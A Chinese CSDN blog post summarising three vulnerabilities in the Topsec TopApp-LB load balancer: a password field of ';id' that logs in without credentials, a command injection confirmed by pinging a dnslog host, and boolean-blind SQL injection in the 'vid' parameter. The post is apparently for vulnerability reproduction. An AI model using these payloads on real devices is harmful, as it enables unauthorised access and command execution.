天融信TopApp-LB 负载均衡系统漏洞总结

最新推荐文章于 2024-02-29 08:56:26 发布
最新推荐文章于 2024-02-29 08:56:26 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 漏洞复现 渗透测试 文章标签: 天融信TopApp-LB 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/108744908
版权

0x00 漏洞描述

1、天融信负载均衡TopApp-LB系统无需密码直接登陆

2、天融信TopApp-LB负载均衡命令执行漏洞

3、天融信TopApp-LB 负载均衡系统Sql注入漏洞

0x01 漏洞复现

 1、使用poc::用户名随意  密码:;id

2、使用poc:; ping xxx.dnslog.info; echo

3.1、抓包

 3.2、vid参数加单引号,报错

3.3、使用or 1=1  or 1=2发现返回界面不一样,证明存在注入点(布尔盲注)

转载请注明:Adminxe's Blog » 天融信TopApp-LB 负载均衡系统漏洞总结

Adminxe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
负载均衡 TopAPP-LB SQL 注入
m0_48520508的博客
09-23 844
网络安全检测与防护技术国家地方联合工程研究中心 1、负载均衡系统概述 天负载均衡系统(以下简称TopApp产品)是一款合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均衡系统让大规模的应用部署轻松实现,同时达至最稳定的运行效果,最高的资源利用率,最佳的应用性能和用户体验。大量的企事业单位通过TopApp-LB负载均衡系统顺利实现了应用部署,满足了息化发展的需求,并极大地提升了工作效率。 天负载均衡设备图: 应用场景图: 2、漏洞
TOPSEC安全管理系统存在远程命令执行漏洞
最新发布
heike_Ch的博客
06-15 886
TopSec安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等。安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
负载均衡上传webshell+apache换行解析漏洞
a505964648的博客
02-09 487
我们执行 hostname -i查看当前执行机器的 ip 时,可以看到一直在飘,因为我们用的是轮询的方式,还算能确定,一旦涉及了权重等其它指标,就让你好好体验一波什么叫飘乎不定。是的,这就是你出现一会儿正常,一会儿错误的原因。由于 antSword 上传文件时,采用的分片上传方式,把一个文件分成了多次HTTP请求发送给了目标,所以尴尬的事情来了,两台节点上,各一半,而且这一半到底是怎么组合的,取决于 LBS 算法。我们假定在真实的业务系统上,存在一个 RCE 漏洞,可以让我们获取 WebShell。
TOPApp-LB负载均衡-2020HW
战神/calmness的博客
09-25 1933
目录 描述 概述 影响 漏洞利用过程 前台绕过 注入 修复建议 天TOPApp-LB负载均衡SQL注入 描述 天负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞,具体为在可以访问管理服务情况 下,攻击者通过构造恶意请求,利用系统检查输入条件不严格的缺陷,进一步可获取部分系统本地息。 概述 天负载均衡系统(以下简称TopApp产品)是一款合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均
2021Kfzz1#wiki#天负载均衡TopApp-LB任意登陆1
07-25
负载均衡TopApp-LB任意登陆漏洞描述天负载均衡TopApp-LB系统无需密码可直接登陆,查看敏感息影响版本天负载均衡TopApp-LB漏洞
TopApp NLB链路负载配置指导文档v2.doc
11-13
负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。系统集成了压缩、缓存、SSL卸载等网络优化技术,加速...
负载均衡配置手册
04-25
负载均衡系统是一款高性能的负载均衡解决方案,旨在帮助企业快速构建高可用、高性能的应用系统。该系统采用先进的负载均衡算法,能够智能地将流量分布到多个服务器上,从而提高系统的整体性能和可用性。 三、...
网络负载均衡系统白皮书.docx
10-13
- **TopApp-81238-NLB-R**:作为负载均衡设备的一个型号,它可能具有特定的硬件配置,如处理能力、内存容量、接口数量等,这些参数决定了设备能处理的并发连接数和最大吞吐量。 3. **产品测试方案** - **测试...
初始账户密码 .xlsx
11-17
产品存在各个设备初始账户密码均不同的情况,此表收集一些常用的账户密码仅供参考
nginx反向代理+负载均衡/上传webshell+apache漏洞
weixin_57385269的博客
02-16 180
搭建完毕后Apache运行在http://your-ip:8080。要保证每一台node上都要有相同的文件。
nginx反向代理+负载均衡上传webshell重难点+apache漏洞
Y1NZE1的博客
02-08 142
nginx反向代理+负载均衡上传webshell重难点+apache漏洞
负载均衡的安全、性能问题
qq1150232675的专栏
03-01 802
负载均衡的安全、性能问题1.负载均衡是否支持https协议? 负载均衡暂时不支持https。但是您可以通过TCP协议配置443端口的方式来实现,区别是安全证书需要保存在您的后端ECS上。 2.遭遇DDOS攻击,是否会产生巨额订单? DDos一般是入流量攻击,SLB接受的入流量会非常大,SLB对于入流量是不会收取费用的,只要不对您的出流量有影响,就不会导致很大的费用。 参考:http://
漏洞复现】某厂商TopApp-LB系统认证绕过漏洞
晚风不及你
02-29 661
负载均衡TopApp-LB系统是一款功能强大的负载均衡产品,能够帮助用户实现高效、稳定、安全的网络应用部署。
TOPSEC Cookie 远程命令执行漏洞
m0_71285176的博客
01-10 526
TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。命令:nuclei.exe -t 选择脚本 -u 扫描地址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值